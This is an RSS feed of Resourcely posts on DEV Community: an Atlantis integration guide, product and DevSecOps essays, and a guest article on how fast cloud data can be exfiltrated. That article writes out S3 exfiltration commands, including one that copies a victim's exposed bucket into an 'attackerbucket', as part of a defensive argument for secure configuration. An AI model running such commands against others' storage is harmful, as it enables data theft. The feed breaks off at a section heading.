<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Resourcely</title>
    <description>The latest articles on DEV Community by Resourcely (@resourcely).</description>
    <link>https://dev.to/resourcely</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F8909%2F6861a92e-86ca-4c82-8cd6-391804a62e7c.png</url>
      <title>DEV Community: Resourcely</title>
      <link>https://dev.to/resourcely</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/resourcely"/>
    <language>en</language>
    <item>
      <title>Resourcely adds Atlantis Support</title>
      <dc:creator>Ryan Cartwright</dc:creator>
      <pubDate>Sat, 03 Aug 2024 02:40:27 +0000</pubDate>
      <link>https://dev.to/resourcely/resourcely-adds-atlantis-support-8nl</link>
      <guid>https://dev.to/resourcely/resourcely-adds-atlantis-support-8nl</guid>
      <description>&lt;p&gt;You can integrate Resourcely with Atlantis to automatically evaluate your Terraform plans on pull requests. The Resourcely guardrail evaluation will result in findings that help developers address the violations.&lt;/p&gt;

&lt;p&gt;In order to set up Resourcely with Atlantis, you must perform the following steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Verifying Prerequisites&lt;/li&gt;
&lt;li&gt;Change management&lt;/li&gt;
&lt;li&gt;Setup Resourcely with Custom workflows&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Verifying Prerequisites
&lt;/h2&gt;

&lt;p&gt;Before adding Resourcely to existing workflows, please verify that your Atlantis server environment:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Has internet egress access to download the Resourcely CLI binary or container (e.g., through a NAT Gateway).&lt;/li&gt;
&lt;li&gt;Is configured to allow custom workflows.&lt;/li&gt;
&lt;li&gt;Is used with GitHub as a VCS.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Change Management
&lt;/h2&gt;

&lt;p&gt;This setup assumes you have already completed the integration of Source Code Management (SCM). If you have not, please follow this guide to complete the &lt;a href="https://docs.resourcely.io/resourcely-terms/settings/change-management/github" rel="noopener noreferrer"&gt;SCM integration&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setup Resourcely with Custom workflows
&lt;/h2&gt;

&lt;p&gt;This requires an Atlantis server-side &lt;code&gt;workflow&lt;/code&gt; written in Atlantis YAML. Create a new file called &lt;code&gt;repos.yaml&lt;/code&gt; or update your existing YAML and add the following content:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;repos:
  - id: /.*/
    workflow: resourcely_guardrails
    allow_custom_workflows: true
    policy_check: false
    pre_workflow_hooks:
      # Install resourcely cli, use location `/opt/resourcely-cli` to run the CLI
      - run: |
            LATEST_RELEASE_TAG=$(curl -s -I &amp;lt;https://github.com/Resourcely-Inc/resourcely-container-registry/releases/latest&amp;gt; | awk -F '/' '/^location/ {print  substr($NF, 1, length($NF)-1)}')
            curl -s -L -O &amp;lt;https://github.com/Resourcely-Inc/resourcely-container-registry/releases/download/$LATEST_RELEASE_TAG/resourcely-cli-${LATEST_RELEASE_TAG}-linux-amd64.tar.gz&amp;gt; &amp;gt; /dev/null &amp;amp;&amp;amp; tar xvzf resourcely-cli-${LATEST_RELEASE_TAG}-linux-amd64.tar.gz &amp;amp;&amp;amp; mv resourcely-cli /opt/resourcely-cli
workflows:
  resourcely_guardrails:
    plan:
      steps:
        - env:
            name: RESOURCELY_API_TOKEN
            value: '&amp;lt;RESOURCELY_API_TOKEN&amp;gt;' # get a token from https://portal.resourcely.io/settings/generate-api-token
        - init
        - plan
        - show 
        # Run Resourcely 
        - run: /opt/resourcely-cli --log debug --api_host https://api.resourcely.io evaluate --change_request_url $PULL_URL  --change_request_sha $HEAD_COMMIT --format plain --plan $SHOWFILE
        description: Running Resourcely Guardrails
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;resourcely-cli&lt;/code&gt; command in your &lt;code&gt;repos.yaml&lt;/code&gt; evaluates your Terraform plans by downloading policies from Resourcely, assessing them, and submitting the results to Resourcely. These findings will be displayed on the pull request associated with the Atlantis run.&lt;/p&gt;

&lt;p&gt;Note that the server needs to run with &lt;code&gt;--repo-config=repos.yaml&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;atlantis server \\
...
--repo-config=repos.yaml \\
...
...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Atlantis should now run the Resourcely CLI on every pull request whenever new code is created or updated.&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>atlantis</category>
      <category>security</category>
      <category>devops</category>
    </item>
    <item>
      <title>Why we built Resourcely</title>
      <dc:creator>Ryan Cartwright</dc:creator>
      <pubDate>Thu, 18 Jul 2024 01:30:11 +0000</pubDate>
      <link>https://dev.to/resourcely/why-we-built-resourcely-4blc</link>
      <guid>https://dev.to/resourcely/why-we-built-resourcely-4blc</guid>
      <description>&lt;p&gt;Written by: Travis McPeak&lt;br&gt;
Published Date: July 16, 2024&lt;/p&gt;

&lt;p&gt;Three primary trends have influenced the software industry over the last 15 years: the rise of the cloud, a shift from waterfall to continuous development, and DevOps practices.&lt;/p&gt;

&lt;p&gt;These trends have all shifted more responsibility to the developer: deployment, security, and configuration are now the responsibility of software engineers. Software teams who were once only responsible for designing and creating applications are now expected to be infrastructure and deployment experts as well. You can read more about the history of security and configuration &lt;a href="https://www.resourcely.io/post/death-of-devsecops-part-1-the-rise-of-cloud-and-devops" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Developers owning infrastructure inevitably results in rampant misconfiguration: improper parameters for cloud infrastructure that are costing companies millions. When a database, virtual machine, or SaaS application is configured incorrectly, there are two results:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;incidents, breaches, and outages&lt;/li&gt;
&lt;li&gt;wasted developer time&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We built Resourcely to eliminate misconfiguration, stemming the tide of needless incidents and tackling the hours of waste we observed throughout the industry.&lt;/p&gt;

&lt;p&gt;Frankly, we were frustrated by the status quo of cloud infrastructure configuration, and we decided to do something about it. Our experiences at top-performing cloud-based companies like Netflix, Robinhood, and Databricks taught us how to solve this problem, and Resourcely is a product of those learnings.&lt;/p&gt;

&lt;p&gt;It allows security, ops, and platform teams to give developers a paved road to production, generating secure and compliant Terraform that is deployed as part of your existing change management tooling. We didn’t stop at bespoke, customizable templates that give developers an easy button to deploy infrastructure. Resourcely also features a novel cloud resource policy language that acts as a safety net: making sure that any Terraform deployed meets the standards that you define.&lt;/p&gt;

&lt;p&gt;With these tools, developers no longer loathe deploying infrastructure, and security teams look like superheroes by empowering secure defaults built into developers.&lt;/p&gt;
&lt;h2&gt;
  
  
  Status quo of configuration
&lt;/h2&gt;

&lt;p&gt;Cloud resources are misconfigured across all software organizations every day. Developers who aren’t Terraform experts are asked to deploy heterogeneous services that they are unfamiliar with. These developers are faced with a trade-off: ship misconfigured infrastructure, or ship slowly. In many cases, businesses are pushing developers to ship faster at the expense of misconfiguration.&lt;/p&gt;

&lt;p&gt;What does that developer experience look like? Developers are forced to research the individual cloud services they want to deploy, learn about configuration best practices for them, write Terraform that matches their mental model, and then push that Terraform in a PR. Often they are asked to use a specialized, internally-developed tool to accomplish this. While many individuals start offthinking that only a single resource will be required, they slowly realize that multiple cloud resources are always required (IAM, networking, storage, etc.). At every step along this path there is friction and opportunity for misconfiguration.&lt;/p&gt;

&lt;p&gt;Security teams are only compounding the problem with long lists of vulnerabilities flagged by CSPMs and a reactive modus operandi. These vulns end up on a long list, handed to developers, who never get around to fixing them anyway.&lt;/p&gt;
&lt;h2&gt;
  
  
  So why does it matter?
&lt;/h2&gt;

&lt;p&gt;These dynamics result in two primary issues costing companies millions of dollars each year:&lt;/p&gt;
&lt;h2&gt;
  
  
  Incidents
&lt;/h2&gt;

&lt;p&gt;Improper configuration inevitably results in incidents, vulnerabilities, and breaches. Let’s consider two scenarios: a security vulnerability, and an internal application that goes down.&lt;/p&gt;

&lt;p&gt;Security vulnerabilities can threaten the very lifeblood of a business. Consider the most simple of examples, where an S3 bucket is left accessible to public access. This is actually somewhat tricky to get right, as &lt;a href="https://www.resourcely.io/post/incident-review-s3-buckets-exposed" rel="noopener noreferrer"&gt;we’ve written about before&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Inadvertent exposure of data, or server access, or firewalls, or anything sensitive can result in public-facing breaches that cost upwards of millions of dollars. As of 2023, &lt;a href="https://www.statista.com/statistics/273575/us-average-cost-incurred-by-a-data-breach/" rel="noopener noreferrer"&gt;the average cost of a data breach in the US was around $9.5M&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Misconfiguration doesn’t only have to be about security and data breaches. Consider an internal application that is used to support customer service agents for an airline. Let’s say you have a database misconfiguration that results in queries to that database failing for several hours during peak travel season. This has directly impacted your customer satisfaction, retention, and future revenue prospects.&lt;/p&gt;
&lt;h2&gt;
  
  
  Developer productivity
&lt;/h2&gt;

&lt;p&gt;In the same way that incidents have a quantifiable impact on your business, so does developer productivity - especially for businesses with software as a core product. Deploying and configuring infrastructure is a significant impediment to the speed at which developers move. To successfully do this they must:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Research cloud resources to use&lt;/li&gt;
&lt;li&gt;Figure out the correct configuration, which is challenging to get completely right without being an expert&lt;/li&gt;
&lt;li&gt;Write Terraform or use a Terraform module&lt;/li&gt;
&lt;li&gt;If they use a module, they’re often fitting a square peg into a round hole&lt;/li&gt;
&lt;li&gt;Push that Terraform to production&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Frequently, the Terraform they’ve written is bounced back to them by a reviewer, which further compounds the developer productivity problem. Maintaining, updating, triaging, and changing their infrastructure can result in even more hours than they spent on the initial project.&lt;/p&gt;

&lt;p&gt;Let’s say you have just 100 developers pushing infrastructure to production, with an average infrastructure deployment that make infrastructure changes 2/week. If your developers spend 4 additional hours each time they deploy researching Terraform and (trying) to get the configuration right, and they cost $275,000 fully loaded, you’re looking at $5.5M in annual cost and an incalculable amount of opportunity cost (from projects they could be working on instead).&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;👉 (100 developers) * (2 infra deployments/week) * (52 weeks) * (4 hours/deployments) * (275,000/year / 2,080 hours in a year) = $5.5M annually.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;
  
  
  Secure defaults and the Resourcely answer
&lt;/h2&gt;

&lt;p&gt;So you’ve got a problem costing you millions of dollars a year, and your cost almost triples each time you have an incident. We had these same issues at Netflix, Robinhood, Databricks, and other companies that our founding team worked at.&lt;/p&gt;

&lt;p&gt;We solve this problem is by removing humans from the loop as much as possible. We implemented secure-by-default frameworks across the business, and gave developers a paved road to production that would allow them to get what they need without friction.&lt;/p&gt;

&lt;p&gt;Asking humans to configure infrastructure, when we already know what best practices and company-specific requirements should be, is an outmoded practice rooted in years of on-premise and legacy security practices. Instead, we should be asking machines to make configuration decisions for humans. (Check out &lt;a href="https://a16z.simplecast.com/episodes/cybersecuritys-past-present-and-ai-driven-future" rel="noopener noreferrer"&gt;this episode&lt;/a&gt; of the a16z podcast where our CEO Travis discussed this concept)&lt;/p&gt;

&lt;p&gt;Resourcely tackles misconfiguration at the source: turning security teams into proactive superheroes, and unleashing developers from DevSecOps hell of the past. How do we do it?&lt;/p&gt;
&lt;h2&gt;
  
  
  Guardrails
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://www.resourcely.io/product/guardrails" rel="noopener noreferrer"&gt;Guardrails&lt;/a&gt; govern how infrastructure can be created or changed, preventing inadvertent misconfiguration. These are policies, managed and written by security, ops, or platform teams, and enforced as part of your existing change management/GitOps workflows.&lt;/p&gt;

&lt;p&gt;Imagine you write the following policy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GUARDRAIL "Require prefix on all S3 buckets"
   WHEN aws_s3_bucket
       REQUIRE bucket STARTS WITH "resourcely-"
 OVERRIDE WITH APPROVAL @securityops
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Resourcely will:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Let the developer know they are violating a guardrail if they don’t start an S3 bucket with resourcely-&lt;/li&gt;
&lt;li&gt;Guide the user about how they should be configuring the resource&lt;/li&gt;
&lt;li&gt;If the developer still chooses to continue, Resourcely will route the PR to the appropriate approver specified in the guardrail&lt;/li&gt;
&lt;li&gt;The PR will always fail without approval, if the S3 bucket is not appropriately named
Guardrails limit accidental public exposure, oversized infrastructure, inadvertent deletion, and more - all in an easy-to-read policy language remarkably similar to SQL.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Blueprints
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://www.resourcely.io/product/blueprints" rel="noopener noreferrer"&gt;Resourcely Blueprints&lt;/a&gt; are configurable templates, customized by security, ops, or platform teams, that give your developers a paved road to cloud infrastructure resources. They provide a UI with context, selection criteria, lists, and more.&lt;/p&gt;

&lt;p&gt;Once published, blueprints are available in a service catalog that developers can use to bundle the infrastructure they want to deploy. Guardrails can be attached to blueprints, ensuring that your policies are enforced.&lt;/p&gt;

&lt;p&gt;After submission, Terraform is generated and deployed through your existing change management and review processes.&lt;/p&gt;

&lt;p&gt;Configuration platform&lt;br&gt;
Over the next few weeks, we’ll be announcing the General Availability of Resourcely, covering how our customers are using it to build a secure-by-default platform for deploying infrastructure, and showing you how anyone can do the same.&lt;/p&gt;

&lt;p&gt;The misconfiguration problem is widespread and hugely impactful. Adopt the premier configuration platform to eliminate misconfiguration, reducing millions in developer waste and bidding goodbye to incidents &amp;amp; breaches that average $9.5M of impact. &lt;a href="https://www.resourcely.io/sign-up" rel="noopener noreferrer"&gt;Get started with Resourcely today&lt;/a&gt;, and follow along on our GA launch journey over the next few weeks!&lt;/p&gt;

</description>
      <category>devops</category>
      <category>news</category>
      <category>security</category>
      <category>startup</category>
    </item>
    <item>
      <title>Death of DevSecOps, Part 3</title>
      <dc:creator>Ryan Cartwright</dc:creator>
      <pubDate>Fri, 05 Jul 2024 16:12:42 +0000</pubDate>
      <link>https://dev.to/resourcely/death-of-devsecops-part-3-5bae</link>
      <guid>https://dev.to/resourcely/death-of-devsecops-part-3-5bae</guid>
      <description>&lt;p&gt;Written by Travis McPeak, Resourcely CEO.&lt;/p&gt;

&lt;p&gt;In &lt;a href="https://www.resourcely.io/post/death-of-devsecops-part-2"&gt;part 2 of this series&lt;/a&gt;, I explored the promises of DevSecOps and where they went wrong. To wrap up this series, we’ll propose how to solve the current problems in security and software development and highlight some early success cases using this approach.&lt;/p&gt;

&lt;p&gt;DevSecOps has two primary problems: we asked developers to be the primary owners of security configuration at the expense of their primary responsibilities, and we haven’t provided automation tools that can take SecOps off their plate.&lt;/p&gt;

&lt;p&gt;The result? Developers are burning down never-ending tickets, going through tedious threat modeling exercises across all of their applications, and undergoing hours of training for all vulnerability classes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Secure-by-default
&lt;/h2&gt;

&lt;p&gt;The solution is secure-by-default: an approach that shifts responsibility onto systems, not people. Secure defaults integrate security and configuration guidelines into tools that developers are using, leveraging new libraries that make security the default, all supported by a new security team. In short, systems ****should be responsible for security, not people.&lt;/p&gt;

&lt;p&gt;Secure-by-default can help developers move faster and reduce incidents by automatically taking care of secure configuration without requiring developers to make complex, nuanced decisions - and stepping in to help them, when they make incorrect ones.&lt;/p&gt;

&lt;h2&gt;
  
  
  New technologies
&lt;/h2&gt;

&lt;p&gt;The past ~10 years of DevSecOps have taught us some valuable lessons about developer behavior: they are not security experts, and they don’t like to leave their standard development and CI workflow.&lt;/p&gt;

&lt;p&gt;To accomplish secure-by-default, any automated tooling needs to be embedded into existing developer workflows. This ranges from auto-suggesting security best practices within IDEs, to embedded context wherever configuration occurs, to using systems that make good security choices for you.&lt;/p&gt;

&lt;p&gt;Some great examples of secure default libraries and systems are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://github.com/Netflix/lemur"&gt;Netflix’s Lemur&lt;/a&gt;: makes it easy for a developer to get a TLS certificate for a microservice, without having to deal with cryptography, manage private keys securely, and remember to rotate certs before they expire&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://bughunters.google.com/blog/4925068200771584/the-family-of-safe-golang-libraries-is-growing"&gt;Google’s Safe Golang Libraries&lt;/a&gt;: protect against common issues such as YAML injection (see also &lt;a href="https://blog.google/technology/safety-security/tackling-cybersecurity-vulnerabilities-through-secure-by-design"&gt;Google’s Secure by Design&lt;/a&gt;)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;See Clint Gibbler’s full list of secure by default libraries &lt;a href="https://github.com/tldrsec/awesome-secure-defaults"&gt;here&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The second critical part of a secure-by-default platform is guardrails: policies and rules that proactively prevent misconfiguration, again embedded into the developer’s workflow. These are backstops that prevent developers from deploying vulnerable software, while allowing them to follow their existing workflow: developing locally, pushing to the cloud, using version control, and leveraging automated deployment tooling.&lt;/p&gt;

&lt;p&gt;These embedded secure-by-default practices combine with guardrails that keep developers in track - resulting in a paved road to production. There should be paved roads across a variety of fields: infrastructure, application development, CI, and more.&lt;/p&gt;

&lt;h2&gt;
  
  
  The new security team
&lt;/h2&gt;

&lt;p&gt;Automated tools that can take cognitive load off of developers are only possible with a savvy security team that is willing to truly embed security where developers are. This team should:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Shift from a reactive, issue-centric view of the world to a proactive, preventative strategy&lt;/li&gt;
&lt;li&gt;Aggressively embed linters, context, and other in-IDE tech to help developers deploy securely at development time&lt;/li&gt;
&lt;li&gt;Utilize secure by default libraries and frameworks that make classes of vulnerabilities impossible&lt;/li&gt;
&lt;li&gt;Implement backstops and guardrails that preserve optionality by developers, while preventing incorrect configuration
The foundational work of security should be done BY a security team, FOR a developer team - shifting the burden of security decision-making from developers onto systems, and making the last mile work for developers painless.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These new automation technologies will allow a security team to become extensible, scaling with a development team by embedding into their workflows without having to add additional security resources and burning out developers.&lt;/p&gt;

&lt;h2&gt;
  
  
  DevSecOps: Can it be saved?
&lt;/h2&gt;

&lt;p&gt;Security teams have lagged their developer counterparts over the past 20 years, as cloud computing and dev practices have revolutionized the tech industry. While DevSecOps held great promise, it has resulted in the worst of both worlds: slow development, and frustrated security teams dealing with constant misconfiguration.&lt;/p&gt;

&lt;p&gt;The next generation of security is secure-by-default. We have the tech, and we know what it takes to accomplish it - the only thing left is committed security teams helping embed secure-by-default into developer workflows.&lt;/p&gt;

&lt;p&gt;Resourcely is working hard on this problem! To make your organization secure-by-default, &lt;a href="https://www.resourcely.io/sign-up"&gt;get started with Resourcely&lt;/a&gt; and give your developer teams the security capabilities they need without leaving the tools they love.&lt;/p&gt;

&lt;p&gt;Originally Published &lt;a href="https://www.resourcely.io/post/death-of-devsecops-part-3"&gt;Resourcely Blog&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>devsecops</category>
      <category>security</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Gone in 120 seconds</title>
      <dc:creator>Christopher Reuter</dc:creator>
      <pubDate>Tue, 02 Jul 2024 14:25:44 +0000</pubDate>
      <link>https://dev.to/resourcely/gone-in-60-seconds-3gcl</link>
      <guid>https://dev.to/resourcely/gone-in-60-seconds-3gcl</guid>
      <description>&lt;p&gt;This article was &lt;a href="https://www.resourcely.io/post/cloud-exfil-speed"&gt;originally published&lt;/a&gt; on the Resourcely blog, and is guest-written by Haoxi Tan.&lt;/p&gt;

&lt;p&gt;There's been a significant increase in the number of SaaS and cloud based data breaches, from &lt;a href="https://www.bleepingcomputer.com/news/security/trello-api-abused-to-link-email-addresses-to-15-million-accounts/"&gt;API abuse&lt;/a&gt;, data theft from &lt;a href="https://www.bleepingcomputer.com/news/security/misconfigured-firebase-instances-leaked-19-million-plaintext-passwords/"&gt;exposed cloud assets&lt;/a&gt;, to straight up "login and exfil" using stolen credentials (such as in the case of the &lt;a href="https://arstechnica.com/security/2024/06/ticketmaster-and-several-other-snowflake-customers-hacked/"&gt;Snowflake hacking spree&lt;/a&gt;), with cloud based data breaches show no signs of slowing down.&lt;/p&gt;

&lt;p&gt;Cloud providers like AWS, GCP, and Azure are called "Public Cloud" for a reason - anyone can sign up and use them, including attackers. It takes minutes for an attacker to open a new account and get access to virtually unlimited data storage and compute, often hosted in the same high-speed data centers as their victim's assets.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cloud-to-cloud exfiltration
&lt;/h2&gt;

&lt;p&gt;Let's take a classic example of bad actors stealing data: copying files from a publicly available AWS S3 bucket. If an attacker is downloading files from the S3 bucket to their local machine, the speed would depend on how fast their internet is, how many hops they are using for VPN, and so on. However, even with a very slow network speed and the default AWS API client, they can easily download up to 20 files a second to their local machine by running a simple command:‍&lt;/p&gt;

&lt;p&gt;&lt;code&gt;aws s3 cp s3://bucketname . --recursive&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frsfi3vi5zrt35dpxzaiq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frsfi3vi5zrt35dpxzaiq.png" alt="Exfiltration log results using s3p" width="800" height="85"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This command was run behind a VPN on a home network connection (with average 10MB/s of internet speed) for about 200 seconds. The default aws cli isn't very fast, and was only able to utilize a small part of the bandwidth and download at around 140 KB/s), and yet it was able to download around 4000 files from an open S3 bucket in 200 seconds. &lt;/p&gt;

&lt;p&gt;Using an optimized tool called s3p, which massively parallelizes S3 API calls to perform the data exfiltration in the same network environment, achieved much better results: over 800 files per second at top speed:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;s3p cp --bucket bucketname --to-folder&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffgq4he442422qzmlpc11.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffgq4he442422qzmlpc11.png" alt="Exfiltration log results using s3p" width="800" height="99"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Even worse, if an attacker runs s3p on an EC2 instance in the same cloud region as their victim's data to copy the files into their own S3 bucket, the transfer would be processed entirely from inside the cloud provider's data centers, like so:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;s3p cp --bucket bucketname --to-bucket attackerbucket&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;They can copy all the data to their own AWS account at massive speeds, then use other VPS (Virtual Private Server) instances in &lt;a href="https://en.wikipedia.org/wiki/Bulletproof_hosting"&gt;bulletproof hosting&lt;/a&gt; providers to exfiltrate that data outside of AWS where takedown is much more difficult.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feyptjiygwdq2hr3ipbf7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feyptjiygwdq2hr3ipbf7.png" alt="A summary table of results exfiltrating data" width="800" height="222"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Using s3p on a EC2 instance to optimize the number of API calls, cloud-to-cloud transfers could reach up to 8 gigabytes per second. That means for an exposed S3 bucket with 1TB of data, it could all end up in the attacker's AWS account in just over 2 minutes. By the time the incident is detected, the data would have already ended up for sale in a hacking forum.&lt;/p&gt;

&lt;h2&gt;
  
  
  APT: Advanced Persistent Teenagers
&lt;/h2&gt;

&lt;p&gt;As companies move their assets to the cloud and migrate from on-premise applications to SaaS apps, attackers are constantly innovating. One particular Advanced Persistent Threat (APT) group called &lt;a href="https://attack.mitre.org/groups/G1015/"&gt;Scattered Spider&lt;/a&gt; (a.k.a. Octo Tempest) is a group of English-speaking teenagers particularly well versed in exploiting cloud-based applications and services.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyl6pn67g5eu1tfprg65f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyl6pn67g5eu1tfprg65f.png" alt="Screenshot of a news article mentioning Scattered Spider" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The group had focused on SIM swapping attacks and ransomware in the past to gain access to large companies, but recently pivoted towards &lt;a href="https://www.bleepingcomputer.com/news/security/scattered-spider-hackers-switch-focus-to-cloud-apps-for-data-theft/"&gt;data theft attacks in cloud and SaaS systems&lt;/a&gt; for extortion purposes without deploying ransomware. Octo Tempest was named &lt;a href="https://www.bleepingcomputer.com/news/security/microsoft-octo-tempest-is-one-of-the-most-dangerous-financial-hacking-groups/"&gt;one of the most dangerous financial hacking groups by Microsoft&lt;/a&gt;, and it's gone cloud native.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ofxkuau9t2v94n6em0l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ofxkuau9t2v94n6em0l.png" alt="Cloud-based MITRE ATT&amp;amp;CK techniques employed by Scattered Spider" width="800" height="265"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Google's Mandiant &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications/"&gt;said&lt;/a&gt; that after the reconnaissance phase, the group performs "exfiltration from SaaS applications through cloud synchronization utilities, such as Airbyte and Fivetran, to move data from cloud-hosted data sources to external attacker-owned cloud storage resources, such as S3 buckets''.&lt;/p&gt;

&lt;h2&gt;
  
  
  No response fast enough
&lt;/h2&gt;

&lt;p&gt;With the speed of the cloud and attackers moving away from ransomware deployment to extortion via data theft, it's virtually impossible to respond fast enough to these incidents. Once an exposed, misconfigured cloud asset has been discovered by attackers, exfiltration can start in a matter of seconds. &lt;/p&gt;

&lt;p&gt;Unlike ransomware, which moves across different systems with suspicious hands-on-keyboard activity that can be detected by Endpoint Detection and Response, data exfiltration activity in the cloud looks much like normal data access, and once the data is lost it cannot be recovered by incident response.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tbyli1u2ouotc7403cw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tbyli1u2ouotc7403cw.png" alt="Screenshot of AWS CloudTrail documentation" width="800" height="363"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;CloudTrail is the logging service for AWS, central to all other tooling that analyzes logs for security events. The CloudTrail FAQ page notes that an API call event is usually delivered from CloudTrail within 5 minutes (300 seconds) of the API call. Given that the top speed of data exfiltration above is 8GB/s, that gives an attacker the ability to exfiltrate around 2TB of data before the event log is even delivered to your security tooling - and by that point your data is long gone. &lt;/p&gt;

&lt;h2&gt;
  
  
  Secure configuration is the only prevention
&lt;/h2&gt;

